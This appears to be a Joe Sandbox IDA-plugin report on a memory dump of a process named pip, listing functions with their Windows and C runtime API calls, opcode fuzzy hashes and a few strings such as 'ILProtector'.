Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 982ea0db8ba21267d61e65287d8a997f4f8916cbf77cb859e5f9e45c8c3731a8
Instruction ID: 6934ca3ce67646729a1b5a5e0936bfcc6c43b1f42da6de56ee2cf91edbf900b3
Opcode Fuzzy Hash: 982ea0db8ba21267d61e65287d8a997f4f8916cbf77cb859e5f9e45c8c3731a8
Instruction Fuzzy Hash: 0AC136726097009FD310EF68C88095ABBF5BFC9308F348A4DE5A897765D771E846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF06B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CF06C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CF06CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CF06CC7

Part of subcall function 6CF05760: std::tr1::_Xweak.LIBCPMT ref: 6CF05769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF06CF9

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF06F13
InterlockedCompareExchange.KERNEL32(6CF8C6A4,45524548,4B4F4F4C), ref: 6CF06F34

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: 2eedcebe8422c6e27131b3f8c0d4d9d829f031aebdf99fb72cbf2b6bfad8a8c4
Instruction ID: bf7241ddf16137359bf12382ec946e1da2219d3a3b402dd1eea5b958c0838807
Opcode Fuzzy Hash: 2eedcebe8422c6e27131b3f8c0d4d9d829f031aebdf99fb72cbf2b6bfad8a8c4
Instruction Fuzzy Hash: 1ED1E571B112049FDB00CFA4C8A4BEE7BB8AF45708F248569F915EBB81D770E944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF16B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::tr1::_Xweak.LIBCPMT ref: 6CEF1B53
std::_Xinvalid_argument.LIBCPMT ref: 6CEF1B5D
std::exception::exception.LIBCMT ref: 6CEF1C43
__CxxThrowException@8.LIBCMT ref: 6CEF1C58

Strings

invalid vector<T> subscript, xrefs: 6CEF1B58

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: invalid vector<T> subscript
API String ID: 3098024973-3016609489
Opcode ID: d732ff2787be07601e9744c9759efffc54993b0498a0681a4664757f81e2a5e3
Instruction ID: 869a195b4c2ead32fc0021b7d7abcbb6633d9b19b0952d3bf3a0e60f66aa316d
Opcode Fuzzy Hash: d732ff2787be07601e9744c9759efffc54993b0498a0681a4664757f81e2a5e3
Instruction Fuzzy Hash: 29223BB1D00749DFCB20CFA4C4809DEBBB5BF44314F60865ED45AABB50E774AA89CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 70f3e7f36cfe840f846b5ced44c1eb41ffcd72819db59500cdac7a948431cc35
Instruction ID: 4069f9e3230f6128a9cc4df7b7c5431a27bafa475b126fadcd1eddefcb0936d1
Opcode Fuzzy Hash: 70f3e7f36cfe840f846b5ced44c1eb41ffcd72819db59500cdac7a948431cc35
Instruction Fuzzy Hash: C2314870F016189FCB00CB69CC90B9EB7F9AF89604F20868AE418EB651DB31EA41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF49BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CF49BCF

Part of subcall function 6CF49D66: __FF_MSGBANNER.LIBCMT ref: 6CF49D7F
Part of subcall function 6CF49D66: __NMSG_WRITE.LIBCMT ref: 6CF49D86
Part of subcall function 6CF49D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF49BD4,6CEE1290,835FE394), ref: 6CF49DAB

std::exception::exception.LIBCMT ref: 6CF49C04
std::exception::exception.LIBCMT ref: 6CF49C1E
__CxxThrowException@8.LIBCMT ref: 6CF49C2F

Strings

Ql, xrefs: 6CF49BF7, 6CF49BFA

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: Ql
API String ID: 615853336-532227320
Opcode ID: 7d4ab54fe1df6736fe7e1403f22dcb23809b1f5ebe65bc02259bf3e95b55c506
Instruction ID: cfed9cf4169c47f5b7af0aa00a1be39fa61970a7c448bffa0aa036f6b0f3f260
Opcode Fuzzy Hash: 7d4ab54fe1df6736fe7e1403f22dcb23809b1f5ebe65bc02259bf3e95b55c506
Instruction Fuzzy Hash: 7EF0FF32B1110AAADF44EBA5CE11AAD7EFCAB02718F208959E40092F92DF718B088650

Uniqueness

Uniqueness Score: -1.00%

Function 6CF03C10 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

SafeArrayGetElement.OLEAUT32(?,?,835FE394), ref: 6CF03C49
VariantInit.OLEAUT32(?), ref: 6CF03C81
VariantClear.OLEAUT32(?), ref: 6CF03D26
VariantClear.OLEAUT32(?), ref: 6CF03D30
VariantClear.OLEAUT32(?), ref: 6CF03D89

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Variant$Clear$ArrayElementInitSafe
String ID:
API String ID: 4110538090-0
Opcode ID: e72a44316f8d6c2148c87d9fca8e68ae4ba16eb25bc4b344570549fb48414bb6
Instruction ID: d16e0ecae3183a8b5159a56a585c841d49e940f23b127b9f526b26abdf74cd47
Opcode Fuzzy Hash: e72a44316f8d6c2148c87d9fca8e68ae4ba16eb25bc4b344570549fb48414bb6
Instruction Fuzzy Hash: 6D617D76A01249DFCB00DFA8C890EAEBBB5FF49714F248599E515EB350C731AD09DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFDB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CF031EC), ref: 6CEFDB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFDB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEFDB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEFDBF1
VariantClear.OLEAUT32(?), ref: 6CEFDBFB

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID:
API String ID: 182531043-0
Opcode ID: 229ef9a8ecb3c582c1c1beda815efa9b7c858cc066eb2b67b69625e476beb348
Instruction ID: b8fbff40f751bf9cf17ab6f8044e79972d987345c20bfb752fab9404fb0724c2
Opcode Fuzzy Hash: 229ef9a8ecb3c582c1c1beda815efa9b7c858cc066eb2b67b69625e476beb348
Instruction Fuzzy Hash: E231B67AA01205AFD701DF55C848EEEBBF8FF8A710F158159ED21A7700D734A901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CF4A42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__CRT_INIT@12.LIBCMT ref: 6CF4A463
__CRT_INIT@12.LIBCMT ref: 6CF4A493
__CRT_INIT@12.LIBCMT ref: 6CF4A4B3

Strings

a0, xrefs: 6CF4A4FF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: T@12
String ID: a0
API String ID: 456891419-3188653782
Opcode ID: 1362e10964c3038cd28bcf907b52a76abec79bf02c436c3841689d71d4370824
Instruction ID: 8c57d26726b1273def36110a8181a24ad28feae1d1bd97fa43a67069c05331ea
Opcode Fuzzy Hash: 1362e10964c3038cd28bcf907b52a76abec79bf02c436c3841689d71d4370824
Instruction Fuzzy Hash: 18110370D0125266DB709A774C4CFAF7EFC9B82758F10D438E465E6A72E634C541CA60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF0C478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF0C488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CF0C4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0C512

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: 3bcccbf8ca6495b2ad68694d91c204a45c952e25c949185b50386c5583d4e150
Instruction ID: af70d5b13915dbb38e2192bb591ac706b3860b4e11089d1780e39116397ad317
Opcode Fuzzy Hash: 3bcccbf8ca6495b2ad68694d91c204a45c952e25c949185b50386c5583d4e150
Instruction Fuzzy Hash: 0B415075B00149AFCB00DF98C890EEEBBB8FB49754F208569F919E7640D730AA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE5A30 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::exception::exception.LIBCMT ref: 6CEE5ACB
__CxxThrowException@8.LIBCMT ref: 6CEE5AE0
std::exception::exception.LIBCMT ref: 6CEE5B18
__CxxThrowException@8.LIBCMT ref: 6CEE5B2D

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID:
API String ID: 3153320871-0
Opcode ID: 8d27c0891af26032aee05dae9df325af83b02617d3bba466cf00716ca7b57671
Instruction ID: 350b9e4b8966e6912ce755b6f2da1882240f4348450429eb8d33632e1bc10f7b
Opcode Fuzzy Hash: 8d27c0891af26032aee05dae9df325af83b02617d3bba466cf00716ca7b57671
Instruction Fuzzy Hash: CD3195B2910609ABCB10DF55D9419DABBF8FF48754F10C66EE81997B40EB70AA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF18D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CF18D8A

Part of subcall function 6CF49D66: __FF_MSGBANNER.LIBCMT ref: 6CF49D7F
Part of subcall function 6CF49D66: __NMSG_WRITE.LIBCMT ref: 6CF49D86
Part of subcall function 6CF49D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF49BD4,6CEE1290,835FE394), ref: 6CF49DAB

Part of subcall function 6CF491F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CF49202

_malloc.LIBCMT ref: 6CF18DAF
std::exception::exception.LIBCMT ref: 6CF18DD4
__CxxThrowException@8.LIBCMT ref: 6CF18DEB

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID:
API String ID: 3043633502-0
Opcode ID: e87cbc93d52e0d31ae96d2415e030ac73f98cb952bda6cef72a1f014af077afe
Instruction ID: 7f67f8cb0cd51151157849281329d285b63e079a28e090e58e90a1426ada7e6f
Opcode Fuzzy Hash: e87cbc93d52e0d31ae96d2415e030ac73f98cb952bda6cef72a1f014af077afe
Instruction Fuzzy Hash: 5FF0CD729083126BD210EB66AE51BDF3ABC9F92614F40882DE95491B02EB21D60C82B3

Uniqueness

Uniqueness Score: -1.00%

Function 6CF11FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::exception::exception.LIBCMT ref: 6CF12206
__CxxThrowException@8.LIBCMT ref: 6CF12221

Part of subcall function 6CF16480: __CxxThrowException@8.LIBCMT ref: 6CF16518
Part of subcall function 6CF16480: __CxxThrowException@8.LIBCMT ref: 6CF16558

Strings

ILProtector, xrefs: 6CF12045

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8Throw$_mallocstd::exception::exception
String ID: ILProtector
API String ID: 84431791-1153028812
Opcode ID: 015db0d4969473b531eea5a82ac799c524560e6086f02ddc7384c0b07146cbac
Instruction ID: 640f46188d381bc4c0492718980ac78412d4af946b48ed1747d71305d0f4820c
Opcode Fuzzy Hash: 015db0d4969473b531eea5a82ac799c524560e6086f02ddc7384c0b07146cbac
Instruction Fuzzy Hash: 17712975E05259DFCB14CFA8C844BEEBBB4EB49304F1481ADD419A7740DB316A48CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF9110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEF913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CEF915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CEF9170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CEF9191

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 15a19a88413cc01ec3e6ab490f28561ef2b689cc0684bb1f96310fe3acb80d51
Instruction ID: 0961e8d7796fb6fb05be282447e029c703d818577b6f2fbc812b090a01890da0
Opcode Fuzzy Hash: 15a19a88413cc01ec3e6ab490f28561ef2b689cc0684bb1f96310fe3acb80d51
Instruction Fuzzy Hash: FB415176900209DFCB04DF99D9848EEBBB4FF49214B21855ED866AB740D730EA05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE5450 Relevance: 4.8, APIs: 3, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::tr1::_Xweak.LIBCPMT ref: 6CEE56D7
std::exception::exception.LIBCMT ref: 6CEE5734
__CxxThrowException@8.LIBCMT ref: 6CEE574B

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

